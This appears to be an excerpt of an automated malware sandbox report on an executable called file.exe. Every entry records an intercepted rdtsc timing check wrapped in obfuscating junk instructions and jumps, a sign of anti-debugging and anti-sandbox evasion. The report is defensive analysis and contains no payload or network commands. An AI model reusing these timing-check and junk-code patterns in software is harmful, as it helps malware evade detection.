              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A2F8 second address: 58A302 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2B9CB0EC0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A302 second address: 58A30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A30C second address: 58A332 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B9CB0EC06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2B9CB0EC15h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A652 second address: 58A656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A656 second address: 58A65A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58A65A second address: 58A666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2B9CBCE6A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AC10 second address: 58AC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AC1A second address: 58AC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2B9CBCE6A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AEF0 second address: 58AEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2B9CB0EC06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AEFC second address: 58AF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AF07 second address: 58AF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590F7F second address: 590F89 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B9CBCE6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5940CC second address: 5940D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5940D2 second address: 5940FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jnl 00007F2B9CBCE6BCh 0x0000000f jmp 00007F2B9CBCE6B4h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5946C2 second address: 5946CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2B9CB0EC06h 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594958 second address: 594971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2B9CBCE6B4h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594971 second address: 594976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594976 second address: 594989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B9CBCE6AAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594B25 second address: 594B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594B29 second address: 594B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2B9CBCE6B7h 0x0000000f jnl 00007F2B9CBCE6A6h 0x00000015 jl 00007F2B9CBCE6A6h 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D4FC second address: 59D519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F2B9CB0EC06h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D519 second address: 59D562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B8h 0x00000007 jmp 00007F2B9CBCE6B5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F2B9CBCE6B1h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D562 second address: 59D574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B708 second address: 59B728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B728 second address: 59B734 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2B9CB0EC06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA55 second address: 59BA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA6D second address: 59BA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA71 second address: 59BA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2B9CBCE6A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA80 second address: 59BA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA8B second address: 59BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2B9CBCE6A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC13 second address: 59BC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC0Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC21 second address: 59BC29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC29 second address: 59BC4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F2B9CB0EC0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC4C second address: 59BC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD78 second address: 59BD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD80 second address: 59BD92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBF2 second address: 59CC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F2B9CB0EC06h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC03 second address: 59CC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B9CBCE6B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC1E second address: 59CC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2B9CB0EC11h 0x0000000b jmp 00007F2B9CB0EC0Eh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jnp 00007F2B9CB0EC06h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC52 second address: 59CC60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2B9CBCE6ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC60 second address: 59CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC64 second address: 59CC74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6ABh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B144 second address: 59B14A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B14A second address: 59B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3C4E second address: 5A3C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F2B9CB0EC17h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A38FC second address: 5A3911 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2B9CBCE6AEh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jns 00007F2B9CBCE6A6h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A60B9 second address: 5A60BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5F0F second address: 5A5F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5F18 second address: 5A5F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2B9CB0EC06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A5F24 second address: 5A5F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B209A second address: 5B20CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F2B9CB0EC08h 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007F2B9CB0EC19h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B20CA second address: 5B20E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B2h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5922 second address: 5B5928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B5928 second address: 5B592E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B592E second address: 5B5934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7F6D second address: 5B7F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007F2B9CBCE6B3h 0x0000000d jmp 00007F2B9CBCE6ACh 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B7F95 second address: 5B7F9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2B9CB0EC0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6875 second address: 5C687B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C687B second address: 5C6885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2B9CB0EC06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5F85 second address: 4E5F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5F8C second address: 4E5F96 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2B9CB0EC0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5F96 second address: 4E5FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5FA1 second address: 4E5FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C66BC second address: 5C66D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C66D2 second address: 5C66DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C66DF second address: 5C6712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2B9CBCE6A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F2B9CBCE6B3h 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b je 00007F2B9CBCE6AAh 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6712 second address: 5C671A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7F41 second address: 5C7F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2B9CBCE6A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7F4B second address: 5C7F57 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2B9CB0EC06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7F57 second address: 5C7F5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D096B second address: 5D0975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2B9CB0EC06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D0975 second address: 5D097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF92E second address: 5CF932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF932 second address: 5CF963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2B9CBCE6B9h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CFAD2 second address: 5CFAD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CFAD6 second address: 5CFAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4068 second address: 5D406C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D406C second address: 5D409A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jns 00007F2B9CBCE6A6h 0x0000000f jmp 00007F2B9CBCE6B6h 0x00000014 popad 0x00000015 jl 00007F2B9CBCE6ACh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E45D9 second address: 5E45E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F2B9CB0EC06h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5285 second address: 5F5289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5289 second address: 5F5294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5294 second address: 5F529D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F50F6 second address: 5F50FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F50FA second address: 5F5102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F837E second address: 5F83AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2B9CB0EC16h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9E75 second address: 5F9E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9FD2 second address: 5F9FE0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9FE0 second address: 5F9FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9FE6 second address: 5F9FEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9FEA second address: 5F9FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9FF3 second address: 5F9FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F97A second address: 60F997 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F2B9CBCE6B0h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60E7BD second address: 60E7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60E7C5 second address: 60E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60E7CF second address: 60E7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC17h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EAD3 second address: 60EAD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EAD7 second address: 60EAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F2B9CB0EC12h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EAE8 second address: 60EB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2B9CBCE6A6h 0x0000000a push ebx 0x0000000b jc 00007F2B9CBCE6A6h 0x00000011 jno 00007F2B9CBCE6A6h 0x00000017 pop ebx 0x00000018 rdtsc
